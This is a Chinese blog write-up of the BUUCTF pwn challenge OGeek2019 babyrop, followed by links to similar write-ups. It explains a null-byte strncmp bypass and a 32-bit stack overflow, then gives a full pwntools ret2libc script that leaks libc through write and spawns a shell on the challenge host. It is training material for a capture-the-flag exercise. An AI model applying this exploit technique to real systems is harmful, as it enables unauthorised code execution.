BUUCTF PWN OGeek2019 babyrop

最新推荐文章于 2023-04-02 16:58:08 发布
最新推荐文章于 2023-04-02 16:58:08 发布
阅读量349 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/124446361
版权

1.checksec+运行

32位/ NX保护开启/

还有Full RELRO

2.IDA进行中

1.main函数

不明白的函数,不知道的语句,搜索

linux中提供了 /dev/urandom 和 /dev/random 两个来提供随机数

先来了解了解熵是什么

熵:系统状态的混乱程度

linux是根据系统的熵池来产生随机数的。

熵池就是系统当前的环境噪音,环境噪音的来源很多,键盘的输入、鼠标的移动、内存的使用、文件的使用量、进程数量等等。

假如系统的熵不够大,则系统产生的随机数随机效果就不是很好,更易被猜出来.

1./dev/random的random pool依赖于系统中断,因此在系统的中断数不足时,/dev/random设备会一直封锁,尝试读取的进程就会进入等待状态,直到系统的中断数充分够用,/dev/random 是真随机数生成器,它会消耗熵值来产生随机数,同时在熵耗尽的情况下会阻塞,直到有新的熵生成

2./dev/random设备可以保证数据的随机性。/dev/urandom不依赖系统的中断,也就不会造成进程忙等待,但是数据的随机性也不高,/dev/urandom 是伪随机数生成器,它根据一个初始的随机种子(这个种子来源就是熵池中的熵)来产生一系列的伪随机数,而并不会在熵耗尽的情况下阻塞。

 若在系统启动阶段使用 "/dev/urandom" 则可能存在熵池中还不存在任何熵的情况,

这时用 ''/dev/urandom'' 产生的随机数是可预测的
这样的话,除非要在启动启动阶段产生随机数,否则绝大多数情况下还是使用 /dev/urandom 来产生随机数,这样才不会引起程序莫名的挂起。

fd:打开生成随机数的文件

if ( fd > 0 )将buf读入
    read(fd, &buf, 4u);

接下来看看

v2 = sub_804871F(buf);
  sub_80487D0(v2);

2.sub_80487D0(char a1)

read函数栈溢出 

如果a1==127

将0xc8u读入,否则将a1读入

跟进buf看看大小

 

offset=0xe7+4 

 3.sub_804871F(int a1)

strcmp函数可用“\x00”来截断,进而覆盖下面的v5-----[buf]变量,随后让第二个read函数读入的“a1”足够覆盖栈,构造ROP 

payload=b'\x00'+b'\xff'*7
0xff=255采用最大的

1. 浅谈memset函数

定义变量时一定要进行初始化,尤其是数组和结构体这种占用内存大的数据结构

memset() 函数可以说是初始化内存的“万能函数”,初始化新申请的内存,直接操作内存空间

mem(memory)函数原型

# include <string.h>
void *memset(void *s, int c, unsigned long n);

2.浅谈strncmp函数 

函数原型

int strncmp(const char *str1, const char *str2, size_t n)

把 str1 和 str2 进行比较,最多比较前 n 个字节

参数:
str1 -- 要进行比较的第一个字符串。
str2 -- 要进行比较的第二个字符串。
n --    要比较的最大字符数。
返回值:
如果返回值 < 0,则表示 str1 小于 str2。
如果返回值 > 0,则表示 str1 大于 str2。
如果返回值 = 0,则表示 str1 等于 str2。

 将我们输入的值 和 产生的随机数  进行比较

3.接下来常规的ret2libc3进行栈溢出

无system及binsh

4.脚本

from pwn import*
from LibcSearcher import LibcSearcher
#p=process('./11babyrop')
p=remote("node4.buuoj.cn",25479)
elf = ELF('./11babyrop')

write_plt=elf.plt['write']
write_got=elf.got['write']

main_addr=0x8048825

payload1=b'\x00'+b'\xff'*7
p.sendline(payload1)
p.recvuntil('Correct\n')

#泄露read的got地址
payload=b'a'*0xe7+b'a'*0x4
payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(0x8)
p.sendline(payload)

write_addr=u32(p.recv(4))
libc=LibcSearcher('write',write_addr)
print(hex(write_addr))

libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')

p.sendline(payload1)
p.recvuntil('Correct\n')

payload=b'a'*0xe7+b'a'*0x4
payload+=p32(system_addr)+b'aaaa'+p32(bin_sh_addr)
p.sendline(payload)

p.interactive()

Rt1Text
关注
专栏目录
buuctf-[OGeek2019]babyrop
weixin_44864859的博客
04-09 2274
查看主函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read...
BUUCTF [OGeek2019]babyrop
weixin_45441024的博客
01-21 258
BUUCTF [OGeek2019]babyrop 首先我们还是check一下 对我们输入的值和随机数进行比较,这里我们需要知道strlen这个函数识别尾部的方式是\x00,所以这里我们可以通过在输入的一开始就加上’\x00’来绕过,这样v1就等于0了,就满足了这个条件 再找一下之后我们发现了可以执行libc的位置,这里的buf距离栈底有0xe7,但是通过read可以读到a1个字节(这个a1就是函数0x80487ef的返回值),所以只要我们输入一个特别大的值就可以进行溢出 ,剩下的就是常规操作ret
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 4002
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTFpwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 271
BUUCTF 做题练习
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1354
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
buuctf刷题——[OGeek2019]babyrop 1
qq_41560595的博客
03-14 3687
好久好久没做ctf题了,今天得空刷刷buuctf,emm,发现好多都忘了。???????????? 查看权限 不能利用shellcode,但可以构造栈溢出。 查看源程序 为了方便区分,重命名了下函数。 open函数的返回值:如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1; 文件描述符:0,1,2是标准IO输入/输出/错误输出给占用了,当文件open成功了,会返回数值3; read(fd,&buf,4u)是把fd所指向的随机数写入到buf文件中,长度是4个字节。 此时,buf是
[OGeek2019]babyrop
m0_52231248的博客
11-02 119
题目Ubuntu16,libc2.23 Checksec一下,32位程序 Read很明显的溢出,但之前存在两个检查,strlen()在读入/x00后就会截断,同样我们给a1传入/xff来溢出buff(0xe7)。 Offest=0xe7+0x4 程序中没有puts函数但存在write和read函数也能达到相同作用泄露libc基址寻找我们要用的system函数和bin_sh字段。 构造rop链: p32(write_plt)+p32(main_addr)+p32(1)+p3
BUUCTF - PWNbabyrop
古月浪子的博客
03-25 1771
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
[OGeek2019]babyropBUUCTF
qq_41696518的博客
08-27 217
[OGeek2019]babyropBUUCTF
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 549
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
BUUCTF--pwn--[OGeek2019]babyrop【ret2libc】
qq_73149934的博客
12-06 268
BUUCTF--pwn--[OGeek2019]babyrop
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 701
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值